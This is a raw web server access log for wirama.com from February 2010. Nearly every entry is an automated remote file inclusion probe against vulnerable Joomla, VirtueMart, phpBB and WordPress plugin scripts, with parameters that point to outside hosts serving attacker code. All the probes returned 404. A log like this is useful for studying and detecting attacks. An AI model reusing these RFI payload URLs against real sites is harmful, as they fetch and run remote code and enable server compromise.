69.13.69.245 - - [01/Feb/2010:02:42:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
69.13.69.245 - - [01/Feb/2010:02:44:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:45:17 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:02:45:17 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:02:45:17 -0800] "GET /logs/access_090731.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:02:46:23 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:02:46:23 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:02:46:23 -0800] "GET /logs/access_090731.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.13.69.245 - - [01/Feb/2010:02:46:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
69.13.69.245 - - [01/Feb/2010:02:47:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
69.13.69.245 - - [01/Feb/2010:02:48:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.0" 404 - "-" "-" "wirama.com"
212.3.83.14 - - [01/Feb/2010:02:49:19 -0800] "GET /logs/access_091101.log%20%20//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.3.83.14 - - [01/Feb/2010:02:49:19 -0800] "GET /logs//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.3.83.14 - - [01/Feb/2010:02:49:19 -0800] "GET /admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.13.69.245 - - [01/Feb/2010:02:49:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.wirama.com"
69.13.69.245 - - [01/Feb/2010:02:49:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.wirama.com"
69.13.69.245 - - [01/Feb/2010:02:49:32 -0800] "GET /logs/access_090801.log%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.wirama.com"
69.13.69.245 - - [01/Feb/2010:02:49:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
84.19.168.8 - - [01/Feb/2010:02:52:20 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [01/Feb/2010:02:52:20 -0800] "GET /logs/access_091201.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [01/Feb/2010:02:52:20 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [01/Feb/2010:02:53:03 -0800] "GET /logs/access_090329.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [01/Feb/2010:02:54:57 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
84.19.168.8 - - [01/Feb/2010:02:55:01 -0800] "GET /logs/access_091201.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
84.19.168.8 - - [01/Feb/2010:02:55:02 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:02:57:24 -0800] "GET /content.php?page=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:57:26 -0800] "GET /logs/content.php?page=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.3.83.14 - - [01/Feb/2010:02:58:52 -0800] "GET /logs//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.3.83.14 - - [01/Feb/2010:02:58:52 -0800] "GET /admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [01/Feb/2010:02:59:20 -0800] "GET /logs/access_090531.log%20%20//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
84.19.168.8 - - [01/Feb/2010:02:59:20 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
84.19.168.8 - - [01/Feb/2010:02:59:20 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.3.83.14 - - [01/Feb/2010:02:59:52 -0800] "GET /logs/access_091101.log//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:59:56 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:59:56 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:59:57 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:59:57 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:59:57 -0800] "GET /logs/access_091101.log///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:03:00:01 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:03:00:01 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.234 - - [01/Feb/2010:03:00:02 -0800] "GET /logs/access_091031.log HTTP/1.1" 200 65536 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
193.19.177.19 - - [01/Feb/2010:03:01:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:03:01:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:03:01:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:03:01:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:03:01:42 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:03:01:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:03:01:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:03:01:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:03:03 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:03:03 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:03:03 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:03 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:03 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:03 -0800] "GET /logs/access_090329.log%20%20//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:03:03:07 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:03:07 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:03:07 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:13 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:13 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:13 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:13 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:13 -0800] "GET /logs/access_090329.log%20%20//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:13 -0800] "GET /logs/access_090329.log%20%20//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:37 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:37 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:03:37 -0800] "GET /logs/access_090329.log%20%20//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.98.23.9 - - [01/Feb/2010:03:04:11 -0800] "GET /logs/access_090329.log%20%20//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.98.23.9 - - [01/Feb/2010:03:04:11 -0800] "GET /components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.98.23.9 - - [01/Feb/2010:03:04:11 -0800] "GET /logs//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:03:04:58 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:04:58 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:04:58 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:18 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:18 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:18 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:38 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:38 -0800] "GET /logs/access_090901.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:47 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:47 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:47 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:03:07:51 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:08:49 -0800] "GET /logs/access_090329.log//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:03:09:04 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:09:04 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:09:04 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:09:05 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:09:05 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:09:05 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:09:15 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:03:09:25 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.94.194.248 - - [01/Feb/2010:03:10:11 -0800] "GET /components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.94.194.248 - - [01/Feb/2010:03:10:12 -0800] "GET /logs/access_090329.log%20%20//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.94.194.248 - - [01/Feb/2010:03:10:12 -0800] "GET /logs//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:19 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:19 -0800] "GET /logs/access_090331.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:19 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:20 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:20 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:20 -0800] "GET /logs/access_090331.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:40 -0800] "GET /logs/access_090601.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:42 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:42 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:42 -0800] "GET /logs/access_090331.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:10:44 -0800] "GET /components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:10:44 -0800] "GET /logs/access_090331.log//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:10:44 -0800] "GET /logs//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:58 -0800] "GET /components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:58 -0800] "GET /logs//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:10:58 -0800] "GET /logs/access_090331.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:11:16 -0800] "GET /logs/access_090330.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:11:16 -0800] "GET /logs/access_090601.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:11:20 -0800] "GET /logs/access_090601.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:03:11:26 -0800] "GET /logs/access_090330.log//components/errors.php?error=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:11:35 -0800] "GET /logs/access_090330.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:03:11:51 -0800] "GET /logs/access_090330.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:24 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:24 -0800] "GET /logs/access_090801.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:25 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:28 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:28 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:28 -0800] "GET /logs/access_090801.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:35 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:35 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.119.203.89 - - [01/Feb/2010:03:14:35 -0800] "GET /logs/access_090801.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:15:20 -0800] "GET /logs/access_090329.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:03:15:29 -0800] "GET /logs/access_090329.log//components/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
